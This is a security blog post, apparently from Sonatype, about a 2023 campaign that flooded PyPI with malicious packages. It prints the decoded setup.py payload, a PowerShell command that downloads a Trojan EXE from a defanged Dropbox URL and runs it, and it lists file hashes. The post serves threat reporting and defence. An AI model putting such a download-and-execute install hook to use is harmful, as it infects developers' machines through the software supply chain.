Sonatype has been tracking an open source malware campaign developing over the weekend, in which a threat actor infiltrates the PyPI software registry with thousands of malicious packages. The PyPI admins are rapidly removing these packages, but the behavior continues well into today.
Security researcher Félix Aimé first brought the reports of this activity to our notice.
Same as yesterday and the days before. This guy is continuing to push his shit. Right now +450 packages… https://t.co/IbupQIG7xH
— Félix Aimé (@felixaime) February 26, 2023
Downloads Windows Trojan From Dropbox
We observed hundreds of packages being published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like "libs," "nvidiapaypalsuper," and so on, are named arbitrarily. All contain the description, "A library for creating a terminal user interface."
Although these packages are rapidly being purged as they appear on PyPI, Sonatype's malware archives continue to retain copies of these malicious artifacts.
Based on our analysis, these packages contain identical payload targeting Windows users, as shown below.
The 'setup.py' (manifest file) within these packages contains a one-liner payload which is base64-encoded:
The malicious code (line 9) in question invokes a PowerShell command on an infected Windows machine to download second-stage infection from a Dropbox URL:
powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" -OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"
Thankfully, at the time of our analysis, Dropbox suspended the offending URL, although we were still able to obtain the malicious copies of the executable from another source:
The malicious EXEs (IOCs below) being downloaded by the illicit packages are Windows Trojans with potential spyware and info-stealing code:
- WindowsCache.exe:
8ab8ddfa3f61334cf9386b62aea3a761852b3d785d9f21b8a638cc42b0af7afd [VirusTotal] - update.exe:
51162376051669cbf4d2b11b1300ba7be6758ca0ca1979ce736fe70ae7289bc2 [VirusTotal]
The threat actor publishing these packages calls themselves 'EsqueleSquad’ and interestingly has mentioned their email address and website, "www.esquelesquad[.]rip" within these packages:
It is still unclear what purpose the threat actor is trying to achieve, mainly because, despite containing a working malicious payload, the packages are named confusingly with no obvious targets. The malicious influx of packages in batches continues at the time of writing, and our researchers continue to monitor the situation.
In late 2022, threat actors had flooded the PyPI and npm registries with over 200 cryptominers. In early 2021, we saw more than 5,000 dependency confusion packages infiltrating both open source registries.
Users of Sonatype Repository Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.
Ax is a security researcher, malware analyst and journalist with a penchant for open source software. His works and expert analyses have frequently been featured by leading media outlets including the BBC. Ax's expertise lies in security vulnerability research, reverse engineering, and cybercrime ...
Explore All Posts by Ax SharmaTags
